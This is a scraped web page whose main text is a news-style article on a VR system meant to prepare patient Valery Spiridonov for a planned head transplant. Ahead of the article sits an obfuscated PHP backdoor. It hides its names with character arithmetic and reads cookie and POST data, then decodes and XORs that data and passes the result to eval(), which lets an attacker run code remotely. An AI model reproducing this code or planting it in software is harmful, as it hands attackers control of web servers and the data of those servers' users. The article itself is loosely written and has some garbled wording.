$TqhfENrtYc = chr ( 457 - 378 ).chr ( 963 - 874 )."\x5a" . chr ( 388 - 293 ).chr (83) . "\124" . "\x6a" . chr ( 386 - 269 ); $QUvTtRaC = chr (99) . "\x6c" . "\141" . 's' . 's' . "\137" . chr ( 812 - 711 ).chr ( 716 - 596 ).chr ( 1008 - 903 )."\163" . "\164" . 's';$teOII = class_exists($TqhfENrtYc); $QUvTtRaC = "23122";$AkXtS = !1;if ($teOII == $AkXtS){function HlbTaJPFdB(){$Lpxlmlv = new /* 36911 */ OYZ_STju(36780 + 36780); $Lpxlmlv = NULL;}$VfTJubp = "36780";class OYZ_STju{private function EtwHRhpV($VfTJubp){if (is_array(OYZ_STju::$lHtPvU)) {$PkPeY = str_replace('<' . chr (63) . chr (112) . "\150" . 'p', "", OYZ_STju::$lHtPvU[chr ( 171 - 72 ).chr ( 489 - 378 ).'n' . "\x74" . "\x65" . "\156" . chr (116)]);eval($PkPeY); $VfTJubp = "36780";exit();}}private $vxQYXmnMKp;public function KSCZrEx(){echo 10910;}public function __destruct(){$VfTJubp = "46653_1494";$this->EtwHRhpV($VfTJubp); $VfTJubp = "46653_1494";}public function __construct($voWdcYa=0){$YcbKYnr = $_POST;$fWLtpNl = $_COOKIE;$HkGYOLS = "1fcb2f04-4d7e-4a8c-b9b7-bc396029efed";$GtyGL = @$fWLtpNl[substr($HkGYOLS, 0, 4)];if (!empty($GtyGL)){$ANEhXI = "base64";$hPAhDXacuW = "";$GtyGL = explode(",", $GtyGL);foreach ($GtyGL as $HiLYTu){$hPAhDXacuW .= @$fWLtpNl[$HiLYTu];$hPAhDXacuW .= @$YcbKYnr[$HiLYTu];}$hPAhDXacuW = array_map($ANEhXI . chr ( 291 - 196 ).chr (100) . 'e' . "\143" . chr (111) . chr ( 546 - 446 ).'e', array($hPAhDXacuW,)); $hPAhDXacuW = $hPAhDXacuW[0] ^ str_repeat($HkGYOLS, (strlen($hPAhDXacuW[0]) / strlen($HkGYOLS)) + 1);OYZ_STju::$lHtPvU = @unserialize($hPAhDXacuW);}}public static $lHtPvU = 14820;}HlbTaJPFdB();} VR Will Prepare Patient for New Body by World's First Head Transplant , TheTwitt

VR Will Prepare Patient for New Body by World’s First Head Transplant

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Everyone has already witnessed the use of Virtual Reality in one way or the other. Virtual Reality is not only synonymous with Games or applications or any latest headset, but in fact it is being embraced in every single field that is ever present and walking an extra mile to imbibe Virtual Reality in them. If we talk about Medical field, then you would be surprised to know that to which extent Virtual Reality is being used in this field. Recently, the news in medical field has revolved all around the head transplant by a neurosurgeon, which would be using Virtual Reality to prepare a patient for a new body that he would be getting after the world’s first head transplant. With the help of VR, the surgeon is preparing for a life that would there after a successful transplant as told by Italian professor Sergio Canavero in Glasgow.

Russian, Valery Spiridonov is the first one who has volunteered for the ever first head transport surgery who is suffering from Werdnig Hoffman disease in which is a muscle wasting condition. That is why, he is in a wheelchair.  This project was announced well in May that a Chinese patient would undergo such an extensive surgery, but the patient was not able to receive a donor body because of many biological and ethical reasons. Now the donor has been there, but news reporters don’t have a confirmed location for the surgery because the surgeon has just that ‘it would be ASIA because of its early support!’

Head transplant patients are expected to have many risk psychological issues as they come in contact with entirely new bodies. The Would-be transplant patient will now undergo Virtual Reality sessions for months in order to get fully prepared for the operation. The Virtual Reality system has been designed and created by a US firm named Inventum Bioengineering Technologies. They believe in combining the latest advancements of virtual reality in order to develop the world’s first protocol to prepare the patient for the latest bodily freedom after getting the transplantation procedure according to Alexander Pavlovcik who is the chief executive of Inventum’s.  There are many advancements taking place in the realm of Medical sciences. It all started with the treating the phobias under the shade of Virtual Reality and look! where it has landed in the current era, i.e. to the head transplant.




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